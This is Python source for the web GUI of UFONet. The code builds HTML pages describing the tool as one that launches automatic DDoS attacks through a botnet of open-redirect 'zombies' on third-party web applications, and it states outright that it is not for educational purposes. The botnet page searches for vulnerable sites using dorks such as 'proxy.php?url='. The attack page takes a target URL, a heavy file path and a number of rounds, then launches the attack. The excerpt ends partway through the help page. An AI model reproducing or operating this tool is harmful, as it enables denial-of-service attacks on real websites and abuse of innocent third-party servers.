def __init__(self):
self.options = UFONetOptions()
self.pages = {}
self.pages["/header"] = """
<!DOCTYPE html><html>
<head>
<link rel="icon" type="image/png" href="/favicon.ico" />
<meta name="author" content="psy">
<meta name="robots" content="noindex, nofollow">
<meta http-equiv="content-type" content="text/xml; charset=utf-8" />
<title>UFONet: DDoS via WebAbuse</title>
<script language="javascript" src="/lib.js"></script>
<style>
body{font-size:15px}a,a:hover{outline:none;color:lime;font-size:14px;font-weight:700}nav ul ul{display:none}nav ul li:hover > ul{display:block}nav ul{list-style:none;position:relative;display:inline-table}nav ul:after{content:"";clear:both;display:block}nav ul li{font-size:12px}nav ul li a{display:block;padding:2px 3px}html,body{height:100%}ul,li{margin:0;padding:0}.ringMenu{width:100px;margin:80px auto}.ringMenu ul{list-style:none;position:relative;width:100px;color:#fff}.ringMenu ul a{color:#fff}.ringMenu ul li{-webkit-transition:all .3s ease-in-out;-moz-transition:all .3s ease-in-out;-o-transition:all .3s ease-in-out;transition:all .3s ease-in-out}.ringMenu ul li a{display:block;width:100px;height:100px;background:rgba(50,50,50,0.7);text-align:center;line-height:100px;-webkit-border-radius:50px;-moz-border-radius:50px;border-radius:50px}.ringMenu ul li a:hover{background:rgba(230,150,20,0.7)}.ringMenu ul li:not(.main){-webkit-transform:rotate(-180deg) scale(0);-moz-transform:rotate(-180deg) scale(0);-o-transform:rotate(-180deg) scale(0);transform:rotate(-180deg) scale(0);opacity:0}.ringMenu:hover ul li{-webkit-transform:rotate(0) scale(1);-moz-transform:rotate(0) scale(1);-o-transform:rotate(0) scale(1);transform:rotate(0) scale(1);opacity:1}.ringMenu ul li.top{-webkit-transform-origin:50% 152px;-moz-transform-origin:50% 152px;-o-transform-origin:50% 152px;transform-origin:50% 152px;position:absolute;top:-102px;left:0}.ringMenu ul li.bottom{-webkit-transform-origin:50% -52px;-moz-transform-origin:50% -52px;-o-transform-origin:50% -52px;transform-origin:50% -52px;position:absolute;bottom:-102px;left:0}.ringMenu ul li.right{-webkit-transform-origin:-52px 50%;-moz-transform-origin:-52px 50%;-o-transform-origin:-52px 50%;transform-origin:-52px 50%;position:absolute;top:0;right:-102px}.ringMenu ul li.left{-webkit-transform-origin:152px 50%;-moz-transform-origin:152px 50%;-o-transform-origin:152px 50%;transform-origin:152px 50%;position:absolute;top:0;left:-102px}textarea{padding:30px 0}
</style>
"""
self.pages["/footer"] = """</center></body>
</html>
"""
self.pages["/favicon.ico"] = base64.b64decode(
"AAABAAEAEA8AAAEAIAAkBAAAFgAAACgAAAAQAAAAHgAAAAEAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAD/AAAA/wAAAP8AAAD/AAAAAAAAAN0AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAA/wAAAP8AAAD/AAAA/wAAAIEAAAD/AAAA/wAAAAAAAAD/AAAAAAAAAAAAAAD/AAAAlwAAAAAAAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAADtAAAA/wAAAIEAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAP8AAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAXAAAA/wAAAAAAAAAAAAAAAAAAAP8AAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAAAAAAAP8AAAAAAAAAAAAAAAAAAAD/AAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAAAAAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAAAAAAA/wAAAP8AAAD/AAAAAAAAAFwAAAAAAAAA/wAAAP8AAAAAAAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAAAAAAAP8AAAD/AAAA/wAAAOwAAAAAAAAAAAAAAOsAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAP8AAAD/AAAA/wAAAAAAAAD/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALUAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/AAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcQAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhAQAAAWQAAPAGAACAOwAAvHsAALATAACgBwAAI5cAAPPQAADRFwAA8BcAAOg/AADsbwAA998AAPw/AAA="
)
self.pages["/ufonet-logo.png"] = base64.b64decode(
"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"
)
self.pages[
"/"] = self.pages["/header"] + """<script language="javascript">
function Start() {
var win_start = window.open("gui","_parent","fulscreen=yes, titlebar=yes, top=180, left=320, width=640, height=460, resizable=yes", false);
}
</script>
</head>
<body bgcolor="white" text="black" style="font-family: Courier, 'Courier New', monospace;" >
<center><br />
<img src="/ufonet-logo.png">
<br /><br />
<hr>
UFONet - is a tool designed to launch <a href="https://en.wikipedia.org/wiki/Distributed_denial-of-service" target="_blank">DDoS</a> attacks against a target,<br />
using 'Open Redirect' vectors on third party web applications, like <a href="https://en.wikipedia.org/wiki/Botnet" target="_blank">botnet</a>.<br /><br />
<button onclick="Start()">START INTERFACE!</button>
<br /><br /><hr>
"This code is NOT for educational purposes"<br /><br />
Project: <a href="http://ufonet.sf.net" target="_blank">http://ufonet.sf.net</a>
""" + self.pages["/footer"]
self.pages["/gui"] = self.pages["/header"] + """</head>
<body bgcolor="black" text="lime" style="font-family: Courier, 'Courier New', monospace;" >
<center>
<table cellpadding="38" cellspacing="38">
<tr>
<td>
<div class="ringMenu">
<ul>
<li class="main"><a href="gui">Menu</a></li>
<li class="top"><a href="botnet">Botnet</a></li>
<li class="right"><a href="inspect">Inspect</a></li>
<li class="bottom"><a href="attack">Attack</a></li>
<li class="left"><a href="help">Help</a></li>
</ul>
</div>
</td>
<td>
<pre>
Welcome to <a href="https://twitter.com/search?f=realtime&q=ufonet&src=sprv" target="_blank">#UFONet</a> DDoS via WebAbuse Botnet Manager... ;-)
""" + self.options.version + """
</pre>
</td>
</tr>
</table>
""" + self.pages["/footer"]
self.pages["/botnet"] = self.pages[
"/header"] + """<script language="javascript">
function Requests() {
var win_requests = window.open("requests","_blank","fulscreen=no, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
}
function Start(){
dork=document.getElementById("dork").value
if (document.getElementById("dork_list").checked){
document.getElementById("dork_list").value = "on";
} else {
document.getElementById("dork_list").value = "off";
}
dork_list = document.getElementById("dork_list").value
num_results=document.getElementById("num_results").value
params="dork="+escape(dork)+"&dork_list="+escape(dork_list)+"&num_results="+escape(num_results)
runCommandX("cmd_search",params)
}
function showHide()
{
if(document.getElementById("dork_list").checked)
{
document.getElementById("dork_pattern").style.display = "none";
}
else {
document.getElementById("dork_pattern").style.display = "";
}
}
</script>
<script>loadXMLDoc()</script>
</head>
<body bgcolor="black" text="lime" style="font-family:Â Courier, 'Courier New', monospace;" >
<center>
<table cellpadding="38" cellspacing="38">
<tr>
<td>
<div class="ringMenu">
<ul>
<li class="main"><a href="botnet">Botnet</a></li>
<li class="top"><a href="help">Help</a></li>
<li class="right"><a href="inspect">Inspect</a></li>
<li class="bottom"><a href="attack">Attack</a></li>
<li class="left"><a href="gui">RETURN</a></li>
</ul>
</div>
</td>
<td>
<pre>
<u>Manage Botnet</u>: <button onclick="Requests()">Configure requests</button>
<hr>
* Your Army: <a href='javascript:runCommandX("cmd_list_army")'>List</a> | <a href='javascript:runCommandX("cmd_test_army")'>Test!</a>
<form method='GET'>
<hr>
* Search for 'zombies':
<div id="dork_pattern" style="display:block;"> + Using a dork <input type="text" name="dork" id="dork" size="20" placeholder="proxy.php?url="></div>
+ Using a list (from: dorks.txt) <input type="checkbox" id="dork_list" onchange="showHide()">
+ Max num of result <input type="text" name="num_results" id="num_results" size="5" value="10">
</form>
<hr>
<button onClick=Start()>Search</button></pre>
</td>
</tr>
</table>
<hr>
<div id="cmdOut"></div>
""" + self.pages["/footer"]
self.pages["/attack"] = self.pages[
"/header"] + """<script language="javascript">
function Requests() {
var win_requests = window.open("requests","_blank","fulscreen=no, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
}
function Start(){
target=document.getElementById("target").value
path =document.getElementById("path").value
rounds=document.getElementById("rounds").value
params="target="+escape(target)+"&path="+escape(path)+"&rounds="+escape(rounds)
runCommandX("cmd_attack",params)
}
</script>
</head>
<body bgcolor="black" text="lime" style="font-family:Â Courier, 'Courier New', monospace;" >
<center>
<table cellpadding="38" cellspacing="38">
<tr>
<td>
<div class="ringMenu">
<ul>
<li class="main"><a href="attack">Attack</a></li>
<li class="top"><a href="help">Help</a></li>
<li class="right"><a href="botnet">Botnet</a></li>
<li class="bottom"><a href="inspect">Inspect</a></li>
<li class="left"><a href="gui">RETURN</a></li>
</ul>
</div>
</td>
<td>
<pre>
<u>Attacking:</u>
* Set your target <input type="text" name="target" id="target" size="30" placeholder="http(s)://">
* Set place to 'bit' <input type="text" name="path" id="path" size="30" placeholder="/path/big.jpg">
* Number of rounds <input type="text" name="rounds" id="rounds" size="5" value="1">
<hr>
<button onclick="Requests()">Configure requests</button>
<hr>
<button onClick=Start()>START!</button></pre>
</td>
</tr>
</table>
<hr>
<div id="cmdOut"></div>
""" + self.pages["/footer"]
self.pages["/help"] = self.pages[
"/header"] + """<script language="javascript">
function show(one) {
var nb = document.getElementsByTagName("div");
for(var x=0; x<nb.length; x++) {
name = nb[x].getAttribute("class");
if (name == 'nb') {
if (nb[x].id == one) {
nb[x].style.display = 'block';
}
else {
nb[x].style.display = 'none';
}
}
}
}
</script>
</head>
<body bgcolor="black" text="lime" style="font-family:Â Courier, 'Courier New', monospace;" >
<center>
<table cellpadding="38" cellspacing="38">
<tr>
<td>
<div class="ringMenu">
<ul>
<li class="main"><a href="help">Help</a></li>
<li class="top"><a href="botnet">Botnet</a></li>
<li class="right"><a href="inspect">Inspect</a></li>
<li class="bottom"><a href="attack">Attack</a></li>
<li class="left"><a href="gui">RETURN</a></li>
</ul>
</div>
</td>
<td>
<pre>
<div><a id="mH1" href="javascript:show('nb1');" style="text-decoration: none;" >+ Project info</a></div><div class="nb" id="nb1" style="display: none;">
UFONet - is a tool designed to launch <u>automatic DDoS attacks</u> using a botnet
Development began in: 2013
